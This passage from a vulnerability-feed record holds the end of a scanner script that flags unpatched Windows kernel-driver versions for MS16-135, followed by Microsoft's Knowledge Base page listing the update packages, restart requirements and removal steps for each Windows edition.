}\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0 && winVer)\n{\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18524\"))\n {\n Vulnerable_range1 = \"Less than 6.3.9600.18524\";\n VULN1 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win10:1, win10x64:1) > 0 && winVer)\n{\n if(version_is_less(version:winVer, test_version:\"10.0.10240.16384\"))\n {\n Vulnerable_range1 = \"Less than 10.0.10240.16384\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"10.0.10586.0\", test_version2:\"10.0.10586.19\"))\n {\n Vulnerable_range1 = \"10.0.10586.0 - 10.0.10586.19\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.446\"))\n {\n Vulnerable_range1 = \"10.0.14393.0 - 10.0.14393.446\";\n VULN1 = TRUE ;\n }\n}\n\nif(VULN1)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\Win32k.sys\"+ '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN2)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\drivers\\Bowser.sys\"+ '\\n' +\n 'File version: ' + brVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range2 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:49:58", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "description": "<html><body><p>Resolves a vulnerability in Windows that could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of the system.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of the affected system. <br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-135\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-135</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><br/><br/><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3199135\" id=\"kb-link-6\" target=\"_self\">3199135</a> MS16-135: Security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-7\" target=\"_self\">3198234</a> MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3194371\" id=\"kb-link-8\" target=\"_self\">3194371</a> MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198218\" id=\"kb-link-9\" target=\"_self\">3198218</a> MS16-131 and MS16-135: Description of the security update for Windows: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-10\" target=\"_self\">3197873</a> November 2016 Security Only Quality Update for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-11\" target=\"_self\">3197874</a> November 2016 Security Monthly Quality Rollup for Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3197876\" id=\"kb-link-12\" target=\"_self\">3197876</a> November 2016 security only quality update for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3197877\" id=\"kb-link-13\" target=\"_self\">3197877</a> November 2016 Security Monthly Quality Rollup for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-14\" target=\"_self\">3197867</a> November 2016 security only quality update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-15\" target=\"_self\">3197868</a> November 2016 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3198585\" id=\"kb-link-16\" target=\"_self\">3198585</a> Cumulative Update for Windows 10: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-17\" target=\"_self\">3200970</a> Cumulative Update for Windows 10 Version 1607 and Windows Server 2016: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198586\" id=\"kb-link-18\" target=\"_self\">3198586</a> Cumulative Update for Windows 10 Version 1511: November 8, 2016</li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><br/><br/><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 3198234</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 3198234</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-24\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall </span>setup switch or click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-25\" target=\"_self\">Microsoft Knowledge Base Article 3197867</a><br/>See <a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 3197868</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-27\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-28\" target=\"_self\">Microsoft Knowledge Base Article 3197867</a><br/>See <a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-29\" target=\"_self\">Microsoft Knowledge Base Article 3197868</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-30\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-31\" target=\"_self\">Microsoft Knowledge Base Article 3197873</a><br/>See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-32\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197876</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197877</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-33\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197876\" id=\"kb-link-34\" target=\"_self\">Microsoft Knowledge Base Article 3197876</a><br/>See <a href=\"https://support.microsoft.com/help/3197877\" id=\"kb-link-35\" target=\"_self\">Microsoft Knowledge Base Article 3197877</a><br/>See <a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-36\" target=\"_self\">Microsoft Knowledge Base Article 3197873</a><br/>See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-37\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows RT 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">The 3197874 Monthly Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-38\" target=\"_self\">Windows Update</a> only.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-39\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 10 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3198585-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3198585-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3198586-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3198586-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3200970-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3200970-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-40\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198585\" id=\"kb-link-41\" target=\"_self\">Microsoft Knowledge Base Article 3198585</a><br/>See <a href=\"https://support.microsoft.com/help/3198586\" id=\"kb-link-42\" target=\"_self\">Microsoft Knowledge Base Article 3198586</a><br/>See <a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-43\" target=\"_self\">Microsoft Knowledge Base Article 3200970</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2016 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2016:<br/><span class=\"text-base\">WindowsServer2016-KB3200970-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-44\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-45\" target=\"_self\">Microsoft Knowledge Base Article 3200970</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-46\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-47\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-48\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-49\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 3, "modified": "2016-11-11T01:17:01", "id": "KB3199135", "href": "https://support.microsoft.com/en-us/help/3199135/", "published": "2016-11-08T00:00:00", "title": "MS16-135: Security update for Windows kernel-mode drivers: November 8, 2016", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-05-29T22:19:56", "bulletinFamily": "blog", "cvelist": 